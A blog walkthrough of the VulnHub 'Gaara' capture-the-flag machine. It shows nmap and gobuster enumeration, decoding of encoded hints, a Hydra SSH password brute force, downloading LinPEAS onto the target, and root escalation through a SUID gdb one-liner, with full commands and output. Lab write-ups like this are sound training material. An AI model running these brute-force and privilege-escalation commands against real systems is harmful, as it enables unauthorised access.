Gaara: 1 || VulnHub Complete Walkthrough


Hello everyone! Welcome all of my viewers, to this brand-new walkthrough. In today's tutorial, we will be dealing with a vulnerable machine(i.e., Gaara), categorized as "easy" in terms of difficulty.


To begin, you'll need to download the vulnerable image from the VulnHub website. If you're not familiar with VulnHub yet, feel free to check my blog.


Vulhub - Vulnerable By Design

Vulhub is a collection of pre-built vulnerable docker environments that are designed for learning and practicing security testing. It provides various intentionally vulnerable web applications and services for hands-on security training.

After you've successfully downloaded the image, it's time to set up the server using VirtualBox, which is a straightforward process.


Settings Up

1. Launch VirtualBox and go to the "File" menu, and select "Import Appliance". 

2. Import the downloaded ".ova" file. Browse your computer to locate the download file and click "Next." 

5. Review the appliance details and settings. You can keep the default settings or make adjustments based on your needs. Click "Finish" to begin importing.

6. Once the import is done, the “ Gaara ” vulnerable machine will appear in the VirtualBox Manager. Select the virtual machine and click "Settings", and change the network adapter to "Host-only adapter".

Make sure that both your Kali Linux Machine, which is used for performing attacks , and your vulnerable machine must be connected to the same network .

Once the setup is done, it's time to start the Virtual Machines. You'll notice that our Vulnerable Machine is all set, and we now have a login prompt waiting for us. 

Let's dive into the fun!

 

Enumeration

Enumeration is the first step of our attack, aimed at identifying the IP Address of our Target Machine using NetDiscover. To do this, open a terminal, and execute the following command:

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1  

 Currently scanning: 192.168.101.0/16   |   Screen View: Unique Hosts                                                           
                                                                                                                                
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
  192.168.95.112  08:00:27:d1:4d:5f      2     120  PCS Systemtechnik GmbH                                                       
 192.168.95.101  08:00:27:02:55:bb      2     120  PCS Systemtechnik GmbH                                                       
 192.168.95.107  0a:00:27:00:00:0e      1      60  Unknown vendor    

From the scan result, we have obtained our target IP address, which is, " 192.168.95.112 ."


Conducting Network Scans with Nmap

Next, we perform a network scan to detect what ports are open. Scanning the Network is an essential part of the enumeration process. This allows us to understand the attack surface and plan targeted attacks. For this purpose, we'll use the popular Nmap tool. Use the following command, 

Where, 

  • -A determines the target's OS, identifies service versions on open ports, and runs predefined scripts for advanced scanning tasks.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -A 192.168.95.112
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-24 15:15 EDT
Nmap scan report for 192.168.95.112
Host is up (0.0011s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 3ea36f6403331e76f8e498febee98e58 (RSA)
|   256 6c0eb500e742444865effed77ce664d5 (ECDSA)
|_  256 b751f2f9855766a865542e05f940d2f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Gaara
MAC Address: 08:00:27:D1:4D:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.09 ms 192.168.95.112

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.51 seconds
                                                                                                                                 
┌──(kali㉿kali)-[~]
└─$

From the Network scanning, we have spotted two open ports.

  • Port 22/TCP running an SSH service, indicating that with valid credentials, gaining login access to the server will be straightforward
  • Port 80/TCP running an HTTP service, suggesting a vulnerable website is being hosted.


Web Enumeration

Now, let's explore the content of the website running on Port 80. To look at the contents ourselves, open a web browser of your choice, and navigate to the target's IP address in the URL bar at the top of the window.

Upon visiting the webpage, we noticed it only contains an image; there are no significant contents.


Performing Directory Enumeration with Gobuster

To further enumerate the target URL, we need to perform directory busting to discover hidden or hard-to-access directories and pages. We'll use " gobuster " as our tool of choice, using the following command.

Where, 

  • DIR is used to specify the mode of enumeration,
  • -u is used to specify the target URL, and 
  • -w is used to specify the path of the wordlist.
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.95.112/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt   
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.95.112/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/24 15:19:31 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
/Cryoserver           (Status: 200) [Size: 327]

===============================================================
2023/07/24 15:20:46 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ 

As a result of the directory busting, results in finding 2 webpages. One of them returned a 403 status code, meaning we can't access it. So, we proceed to visit the second one.

Although the Cryoserver webpage seems blank at first, upon scrolling down, we discovered three lines of words.

After scrolling to the end of the webpage, we find 3 lines of words that appear to be webpages. Let's examine each one individually to check for any useful information.

Upon analyzing each word, we discover a string of words on the “ /iamGaara ” webpage, we come across a string of words that appear to be encoded.


Decoding Encrypted Text Using CyberChef

Now, Let’s try to decode it using CyberChef. If you don’t know, what is it, then watch this video now.

CyberChef - The Cyber Swiss Army Knife

CyberChef is a powerful web application for encrypting, decrypting, and analyzing data. It provides a wide range of cryptographic, encoding, and data manipulation tools, making it a valuable asset for cybersecurity professionals and enthusiasts.


Paste the encoded word in the input section, and on the “operation section”, type “ from the base ”, and then drag each of them to get the result.


Upon attempting to decode the encoded text using CyberChef, we successfully deciphered the text, which read: " gaara: ismyname ". The word " gaara " appears to be a username.


Bruteforcing SSH Login Passwords with Hydra

Since we have the SSH service running on port 22 and now have a valid username, our next step is to perform a brute-force attack to find the password. We'll use " Hydra " for this, along with the rockyou.txt wordlist. Type the following command:

┌──(kali㉿kali)-[~]
└─$ hydra -l gaara -P /usr/share/wordlists/rockyou.txt -t 30 ssh:// 192.168.95.112
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-24 15:43:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 30 tasks per 1 server, overall 30 tasks, 14344399 login tries (l:1/p:14344399), ~478147 tries per task
[DATA] attacking ssh://192.168.95.112:22/
[22][ssh] host: 192.168.95.112   login: gaara   password: iloveyou2
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-24 15:44:43
                                                                                                                             
┌──(kali㉿kali)-[~]
└─$

Upon successful brute-forcing, we obtain the password associated with the " gaara " username.

Now, that we have a valid username and its corresponding password, we can use an SSH client tool to log into the server, giving us a foothold to proceed further with our attack.

 

Foothold

Now that we have a valid username and password, we can establish a foothold on the server by logging in via an SSH client tool .


Establishing SSH Connection with Username and Password Authentication

Firstly, open a terminal and, type the following command:

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]

Upon clicking enter, the SSH client will attempt to connect to the SSH server . If the username is valid, it will prompt us to input the password for that username.

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
The authenticity of host '192.168.95.112 (192.168.95.112)' can't be established.
ED25519 key fingerprint is SHA256:XpX1VX2RtX8OaktJHdq89ZkpLlYvr88cebZ0tPZMI0I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])?

Type "Yes", to proceed without host authenticity confirmation. Now, we have to input the password for the username.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.95.112' (ED25519) to the list of known hosts.
[email protected]'s password: iloveyou2
Linux Gaara 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Dec 13 17:00:37 2020 from 192.168.1.107
gaara@Gaara:~$

Now, we have successfully gained a foothold on the server. The next objective is to find the user flag. Execute the " ls " command to list files and directories. Once located, use the "cat" command followed by the user flag filename to view its content.

gaara@Gaara:~$ ls
flag.txt   Kazekage.txt                                                                                                        
gaara@Gaara:~$ cat flag.txt 
5451d3eb27acb16c652277d30945ab1e                                                                                              
gaara@Gaara:~$

As you can see, we have successfully obtained the user flag. Now, our main focus is to acquire the root flag. 

gaara@Gaara:~$ cd /root                                                                                                           
-bash: cd: /root: Permission denied                                                                                              
gaara@Gaara:~$

Upon navigating to the root directory to obtain the root flag, we need root permission. It appears to be like that, we lack the necessary permissions to access the root directory. Therefore, let's proceed with Privilege Escalation to elevate our privileges and gain access to the root flag.

 

Privilege Escalation

During privilege escalation , the first step is to gather information about the system and identify potential vulnerabilities or misconfigurations that could allow us to elevate our privileges to gain access to the root level.

Firstly, Enumerate User Permissions to check, the user's privileges and rights on the system. This can be done by running commands like " sudo -l " or " id " to see what commands the current user can run with elevated privileges.

Let me run the “ id ” command to find out the user and group names, and numeric IDs like UID , or group ID of the current user or any other user on the server. 

gaara@Gaara:~$ id
uid=1001(gaara) gid=1001(gaara) groups=1001(gaara)    
gaara@Gaara:~$

Upon running the "id" command, we discovered that both the UID and group belong to the user "gaara".

Now, let's determine the rights and privileges of the current user by executing the " sudo -l " command. On execution, we have found out that the user, “ gaara ” does not have any sudo privilege.

gaara@Gaara:~$ sudo -l                                                                           
sudo: unable to resolve host Gaara: Temporary failure in name resolution                                                         
[sudo] password for gaara:                                                                                                       
Sorry, user gaara may not run sudo on Gaara.                                                                                     
gaara@Gaara:~$

Now, our only option is to search for a way to escalate privileges, and we might find a hint to guide us. After realizing that there is another text file in the same directory, I believe this could be a clue left by the creator. Let's investigate it further.

gaara@Gaara:~$ ls  
flag.txt  Kazekage.txt                                                                                                                                                                                                          
gaara@Gaara:~$ cat Kazekage.txt 
You can find Kazekage here....                                                                                                   
                                                                                                                                 
L3Vzci9sb2NhbC9nYW1lcw==                                                                                                         
gaara@Gaara:~$ 

Inside this file, there is an encoded text. Let's use CyberChef to decode it. 

After decoding, we obtain a directory path, which appears to be a hint for privilege escalation .

Next, let's navigate to this directory, and here, we'll have to list all files, including hidden ones, using the command " ls -al " command. 

gaara@Gaara:~$ cd /usr/local/games                                                                                                
gaara@Gaara:/usr/local/games$ ls -al                                                                                              
total 12                                                                                                                         
drwx------  2 gaara gaara 4096 Jul 25 09:12 .                                                                                    
drwxr-xr-x 10 root  root  4096 Dec 13  2020 ..                                                                                   
-rw-r--r--  1 gaara gaara 1505 Dec 13  2020 .supersecret.txt                                                                     
gaara@Gaara:/usr/local/games$

Among the results, we found another text file named the " .supersecret.txt " file. Let's open it using the "cat" command. 

gaara@Gaara:/usr/local/games$ cat .supersecret.txt 
                                                                                                                                 
Godaime Kazekage:                                                                                                                
                                                                                                                                 
+++++ +++[- >++++ ++++< ]>+++ +.<++ ++++[ ->+++ +++<] >+.-- ---.< +++++                                                          
+++[- >---- ----< ]>--- -.<++ +++++ ++[-> +++++ ++++< ]>+++ +++++ .<+++                                                          
[->-- -<]>- .++++ ++.<+ +++++ +++[- >---- ----- <]>-- --.<+ +++++ +++[-                                                          
>++++ +++++ <]>+. <+++[ ->--- <]>-- --.-- --.<+ ++[-> +++<] >++.. <+++[                                                          
->+++ <]>++ ++.<+ +++++ +++[- >---- ----- <]>-- ----- -.<++ +++++ ++[->                                                          
+++++ ++++< ]>+++ .<+++ [->-- -<]>- --.+. +++++ .---. <++++ ++++[ ->---                                                          
----- <]>-- ----- ----. <++++ +++++ [->++ +++++ ++<]> +++++ +++.< +++[-                                                          
>---< ]>-.+ +++++ .<+++ +++++ +[->- ----- ---<] >---- .<+++ +++++ [->++                                                          
+++++ +<]>+ ++.<+ ++[-> +++<] >+++. +++++ +.--- ----- -.--- ----- .<+++                                                          
+++++ [->-- ----- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++
+++.< +++[- >---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ ++[->
+++++ ++++< ]>++. ----. --.-- ----- -.<++ +[->+ ++<]> +++++ +.<++ +[->-
--<]> ---.+ .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- ----- .<+++
+++++ +[->+ +++++ +++<] >+++. <+++[ ->--- <]>-- -.--- ----. <++++ [->++
++<]> +++.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ ++[-> +++++ +++<]
>++++ +.--- -.<++ ++[-> ++++< ]>++. <+++[ ->--- <]>-. +++.< +++[- >+++<
]>+++ +.<++ +++++ [->-- ----- <]>-- ----- --.<+ ++++[ ->--- --<]> -----
-.<++ +++++ [->++ +++++ <]>++ +.<++ +++[- >++++ +<]>+ ++++. +++++ ++.<+
+++++ +++[- >---- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >++++ .<+++
++[-> +++++ <]>.< ++++[ ->+++ +<]>+ .<+++ [->-- -<]>- ----. +.<++ +[->+
++<]> ++++. <++++ +++++ [->-- ----- --<]> .<
gaara@Gaara:/usr/local/games$

Inside this, we see an encoded text that appears to be written in Brainfuck language. To decode it, we need to visit the official site by searching on Google. 

Once there, we can paste the text and execute the decoding process. The resulting decoded text reveals the message: " It is not easy to find something! Try harder ".

Now, our best option is to use LinPEAS . As mentioned earlier, LinPEAS is a powerful tool used to extract various information, including SUID binaries , vulnerabilities , and more, which can aid in privilege escalation.


SUID Binary Privilege Escalation via GDB Debugger

To get started, you need to download LinPEAS from its GitHub repository.

PEASS-ng - Privilege Escalation Awesome Scripts SUITE new generation

PEASS-ng is a collection of privilege escalation scripts for Windows and Linux. It provides a comprehensive set of tools and scripts to assist in identifying potential privilege escalation vectors during security assessments and penetration testing.

Once you have LinPEAS , initiate a Python3 HTTP server

┌──(kali㉿kali)-[~/Downloads]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
192.168.95.112 - - [24/Jul/2023 15:59:57] "GET /linpeas.sh HTTP/1.1" 200 -

Then, switch back to the target server and use the "wget" command to download LinPEAS from the IP address of the machine running the Python3 HTTP server

gaara@Gaara:/usr/local/games$ wget http://192.168.95.102:8080/linpeas.sh
--2023-07-25 09:25:40--  http://192.168.95.102:8080/linpeas.sh                                                                   
Connecting to 192.168.95.102:8080... connected.                                                                                  
HTTP request sent, awaiting response... 200 OK                                                                                   
Length: 836054 (816K) [text/x-sh]                                                                                                
Saving to: ‘linpeas.sh’                                                                                                          
                                                                                                                                 
linpeas.sh                       100%[=======================================================>] 816.46K  --.-KB/s    in 0.007s   
                                                                                                                                 
2023-07-25 09:25:40 (111 MB/s) - ‘linpeas.sh’ saved [836054/836054]                                                              
                                                                                                                                 
gaara@Gaara:/usr/local/games$  

If you are unsure about the IP address of your host-only adapter, you can use the " ifconfig " command to find it.

After successfully downloading LinPEAS on the attack server, we can use the " ls -al " command to check if the file exists. 

gaara@Gaara:/usr/local/games$ ls -al
total 832                                                                                                                        
drwx------  2 gaara gaara   4096 Jul 25 09:27 .                                                                                  
drwxr-xr-x 10 root  root    4096 Dec 13  2020 ..                                                                                 
-rw-r--r--  1 gaara gaara 836054 Jul 25 09:23 linpeas.sh                                                                         
-rw-r--r--  1 gaara gaara   1505 Dec 13  2020 .supersecret.txt                                                                   
gaara@Gaara:/usr/local/games$ ./linpeas.sh                                                                                        
-bash: ./linpeas.sh: Permission denied   
gaara@Gaara:/usr/local/games$

However, upon running the command, we encounter a "permission error." This indicates that the linpeas.sh file does not have the necessary execution permissions. To resolve this, we need to give execution permission to the “linpeas.sh” file. We can achieve this by using the " chmod +x linpeas.sh " command. 

gaara@Gaara:/usr/local/games$ chmod +x linpeas.sh                                                                                
gaara@Gaara:/usr/local/games$ ls -al                                                                                             
total 832                                                                                                                        
drwx------  2 gaara gaara   4096 Jul 25 09:27 .                                                                                  
drwxr-xr-x 10 root  root    4096 Dec 13  2020 ..                                                                                 
-rwxr-xr-x   1 gaara gaara 836054 Jul 25 09:23 linpeas.sh                                                                         
-rw-r--r--  1 gaara gaara   1505 Dec 13  2020 .supersecret.txt                                                                   
gaara@Gaara:/usr/local/games$

Once the execution permission is granted, we can run the “ linpeas.sh ” file again. This time, it should execute without any issues.

gaara@Gaara:/usr/local/games$ ./linpeas.sh 
After running  linpeas.sh , the tool will generate its output, providing  comprehensive information , including  SUID binaries vulnerabilities , and other relevant data, to aid in the privilege escalation process.

Upon analyzing the LinPEAS output, I discovered that the server is vulnerable to SUID check , which allows for easy privilege escalation , exploitation , and write permissions . I noticed that the gdb file has root permission, presenting an opportunity to gain root privileges.

After conducting some research on Google, I found a GitHub page containing a SUID binary backdoor code. 

GTFOBins - gdb

GTFOBins is a curated list of Unix binaries that can be exploited to bypass local security restrictions in misconfigured systems. The gdb page in GTFOBins provides information on how to use the gdb debugger for privilege escalation and other useful tricks.

gaara@Gaara:/usr/local/games$ gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit                         
GNU gdb (Debian 8.2.1-2+b3) 8.2.1                        
Copyright (C) 2018 Free Software Foundation, Inc.                                                                                
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>                                                    
This is free software: you are free to change and redistribute it.                                                               
There is NO WARRANTY, to the extent permitted by law.                                                                            
Type "show copying" and "show warranty" for details.                                                                             
This GDB was configured as "x86_64-linux-gnu".                                                                                   
Type "show configuration" for configuration details.                                                                             
For bug reporting instructions, please see:                                                                                      
<http://www.gnu.org/software/gdb/bugs/>.                                                                                         
Find the GDB manual and other documentation resources online at:                                                                 
    <http://www.gnu.org/software/gdb/documentation/>.                                                                            
                                                                                                                                 
For help, type "help".                                                                                                           
Type "apropos word" to search for commands related to "word".                                                                    
#

Apologies for the oversight with the "./" in the gdb file, but after trying again, we successfully gained root privileges. You can verify this by running the " whoami " command, which should now show us as the root user

# whoami                                                                                                                         
root                                                                                                                             

To access the root flag, we'll need to navigate to the root directory. Use "ls" to check if the root.txt file exists. Upon finding it, use the "cat" command to view its content.

# cd /root                                                                                                                        
# ls                                                                                                                             
root.txt                                                                                                                         
# cat root.txt                                                                                                                   
                                                                                                                                 
                                                                                                                                 
 ██████╗  █████╗  █████╗ ██████╗  █████╗                                                                                         
██╔════╝ ██╔══██╗██╔══██╗██╔══██╗██╔══██╗                                                                                        
██║  ███╗███████║███████║██████╔╝███████║                                                                                        
██║   ██║██╔══██║██╔══██║██╔══██╗██╔══██║                                                                                        
╚██████╔╝██║  ██║██║  ██║██║  ██║██║  ██║                                                                                        
 ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝

8a763d61f71db8e7aa237055de928d86

Congrats You have Rooted Gaara.

Give the feedback on Twitter if you Root this : @0xJin

Congratulations! We've successfully completed this CTF challenge . If you have any doubts or questions about this video, feel free to write them in the comment section.

Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!